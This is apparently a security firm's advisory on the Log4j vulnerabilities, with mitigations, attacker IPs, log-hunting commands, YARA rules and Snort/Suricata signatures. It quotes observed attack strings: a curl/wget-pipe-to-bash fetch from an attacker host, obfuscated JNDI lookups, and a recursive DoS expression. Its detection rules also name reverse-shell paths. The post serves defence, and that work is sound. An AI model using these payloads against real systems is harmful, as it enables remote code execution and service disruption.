Skip to content

Emerging Threats

Log4j — how to protect your systems (CVE-2021-44228)

· u145 · 11 min read

During the first weeks of December 2021 we observed attacks targeting the Apache Log4j library. On 2021-12-12, an official security advisory disclosed a critical Remote Command Execution vulnerability — CVE-2021-44228 (T1190 — Exploit Public-Facing Application).

Any vulnerable system exposed to the public network is to be considered compromised given the volume of mass-exploitation activity observed worldwide — confidence high.

The Apache Software Foundation has released an emergency security update patching the 0-day; the fixed version is 2.15.0.

Concurrent with the disclosure of CVE-2021-44228 (Log4j 2), a similar vulnerability was identified in the 1.x branch of the same product, affecting configurations that use the JMSAppender class. This vulnerability — CVE-2021-4104 — does not depend on user-controlled input but on the deployed configuration.

Update — 2021-12-20

New Log4j vulnerabilities have been identified in version 2.15.0 (CVE-2021-45046) and 2.16.0 (CVE-2021-45105) — both shipped as patches for the originally vulnerable 2.14.0. The recommended action is to upgrade directly to 2.17.0, which addresses the security issues observed in the previous releases.

CVE-2021-45046

The patch for CVE-2021-44228 proved incomplete in non-default configurations. When the logging configuration uses a non-default Pattern Layout containing a Context Lookup (e.g. $${ctx:loginId}), an attacker controlling Thread Context Map (MDC) input can supply a crafted JNDI Lookup pattern, causing — in some operating environments — information leakage and remote code execution, and in all environments local code execution.

Apache addresses this vulnerability in Log4j 2.16.0.

CVE-2021-45105

Log4j versions from 2.0-alpha1 through 2.16.0 (excluding 2.12.3) do not protect against uncontrolled recursion in self-referential lookups. An attacker controlling Thread Context Map data can trigger a Denial of Service (DoS) by injecting a crafted recursive expression — for example: ${${::-${::-$${::-j}}}}

Apache addresses this vulnerability in Log4j 2.17.0.

Apache Log4j Logo

Detection and Risk Mitigation

Source countries of scanning activity

Below is an overview of the source IP addresses we observed driving exploitation:

Vulnerability and Attack Details

The technical details required to identify, analyse, and mitigate the compromise risk are documented below — closing the exposure window across heterogeneous Java estates is the kind of structured patch and posture programme delivered by our Cybersecurity Advisory.

Affected Applications

A large set of Java-based applications are vulnerable, including:

  • Elastic Search
  • Elastic LogStash
  • GrayLog2
  • Minecraft (client and server)
  • Neo4J
  • Apache projects (Druid, Dubbo, Flink, Flume, Hadoop, Kafka, Solr, Spark, Struts, Tapestry, Wicket)
  • Prodotti VMware (Horizon, vCenter, vRealize, HCX, NSX-T, UAG, Tanzu)
  • Grails
  • Prodotti java custom
  • Redis
  • Video games (e.g. Minecraft)

Vulnerability Details

All Apache Log4j2 versions up to 2.14.1 use the Java Naming and Directory Interface (JNDI) APIs. These features — used in configuration, log messages, and parameters — do not guard against LDAP and JNDI endpoints controlled by malicious actors. As a result, an attacker who can influence log messages or their parameters can execute arbitrary code from an LDAP server whenever Message Lookup Substitution is enabled.
To exploit the vulnerability, attackers can send an HTTP request carrying a specially crafted string that generates a Log4j log entry whose content is then resolved into a JNDI (Java Naming and Directory Interface) request to an attacker-controlled server.

Processing of the malicious server’s response on the vulnerable system executes the code that the attacker has crafted and injected.

How to mitigate the threat

From Log4j 2.15.0 onwards, message lookup substitution is disabled by default, which makes upgrading the simplest and most effective fix.

Other possible mitigations include:

  • In earlier versions, up to 2.10, this threat can be mitigated by setting the following system properties:
    • log4j2.formatMsgNoLookups = true
    • LOG4J_FORMAT_MSG_NO_LOOKUPS=true
  • In versions prior to 2.10, it can be mitigated by removing the JndiLookup class from the classpath:
    • zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
  • On Java 8u121, set:
    • com.sun.jndi.rmi.object.trustURLCodebase = false
    • com.sun.jndi.cosnaming.object.trustURLCodebase = false

Information on ongoing attacks

  • The jndi interface used to fetch (via a specific protocol: dns, ldap, etc.) the malicious Java object:
  • All requests carry the malicious payload (often in the User-Agent or Referer header)
  • Most payloads are Base64-encoded:
(curl -s <malicious IP>:<Port>/<victim IP>:<victim Port>||wget -q -O- <malicious IP>:<Port>/<victim IP>:<victim Port>)|bash

Observed URIs

URI (useful for detection)
/Basic/Command/Base64/<Base64Code>
/a
/callback
/Exploit
/epepap
/b

Obfuscation methods

  • ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

Attacker IPs

  • 159.65.194.103
  • 159.89.122.19
  • 165.22.213.246
  • 165.227.37.189
  • 167.172.44.255
  • 167.71.13.196
  • 167.99.186.227
  • 176.32.33.14
  • 178.17.174.14
  • 178.62.23.146
  • 195.54.160.149
  • 45.137.21.9
  • 45.155.205.233
  • 61.19.25.207

Attack identification

From application logs

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log


sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+'


sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -I -i 'jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):'" \;


sudo find /var/log/ -name '*.gz' -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):'" \;

YARA

rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
   meta:
      description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      score = 70
   strings:
      $x1 = "${jndi:ldap:/"
      $x2 = "${jndi:rmi:/"
      $x3 = "${jndi:ldaps:/"
      $x4 = "${jndi:dns:/"
   condition:
      1 of them
}


rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
   meta:
      description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      score = 80
   strings:
$x1 = /${jndi:(ldap|ldaps|rmi|dns):/[/]? [a-z-.0-9] {3,120}:[0-9]{2,5}/[a-zA-Z.] {1,32}} /
$fp1r = /(ldap|rmi|ldaps|dns):/[/]? (127.0.0.1|192.168.| 172.[1-3][0-9].| 10.)/
   condition:
      $x1 and not 1 of ($fp*)
}


rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {
   meta:
      description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/Reelix/status/1469327487243071493"
      date = "2021-12-10"
      score = 70
   strings:
      /* curl -s  */
      $sa1 = "Y3VybCAtcy"
      $sa2 = "N1cmwgLXMg"
      $sa3 = "jdXJsIC1zI"
      /* |wget -q -O-  */
      $sb1 = "fHdnZXQgLXEgLU8tI"
      $sb2 = "x3Z2V0IC1xIC1PLS"
      $sb3 = "8d2dldCAtcSAtTy0g"
   condition:
      1 of ($sa*) and 1 of ($sb*)
}


rule SUSP_JDNIExploit_Indicators_Dec21 {
   meta:
      description = "Detects indicators of JDNI usage in log files and other payloads"
      author = "Florian Roth"
      reference = "https://github.com/flypig5211/JNDIExploit"
      date = "2021-12-10"
      score = 70
   strings:
$xr1 = /ldap://[a-zA-Z0-9.] {7,80}:[0-9]{2, 5}/(Basic/Command/Base64| Basic/ReverseShell| Basic/TomcatMemshell| Basic/JBossMemshell| Basic/WebsphereMemshell| Basic/SpringMemshell| Basic/Command| Deserialization/CommonsCollectionsK| Deserialization/CommonsBeanutils| Deserialization/Jre8u20/TomcatMemshell| Deserialization/CVE_2020_2555/WeblogicMemshell| TomcatBypass| GroovyBypass| WebsphereBypass)//
   condition:
      filesize < 100MB and $xr1
}


rule SUSP_EXPL_OBFUSC_Dec21_1{
   meta:
      description = "Detects obfuscation methods used to evade detection in log4j exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/testanull/status/1469549425521348609"
      date = "2021-12-11"
      score = 60
   strings:
      /* ${lower:X} - single character match */
      $ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }
      /* ${upper:X} - single character match */
      $ = { 24 7B 75 70 70 65 72 3A ?? 7D }
      /* URL encoded lower - obfuscation in URL */
      $ = "$%7blower:"
      $ = "$%7bupper:"
      $ = "%24%7bjndi:"
      $ = "/$%7bjndi:"
   condition:
      1 of them
}

Intrusion Detection: Snort/Suricata 

alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034653; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034654; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034655; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034656; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034657; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034658; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)

ATTACK PAYLOAD

https://gist.github.com/nathanqthai/01808c569903f41a52e7e7b575caa890

C2 DOMAIN NAME

https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8

ATTACK IP

https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217

Learn about Fortgale services

Contact us

Speak with our analysts Blog home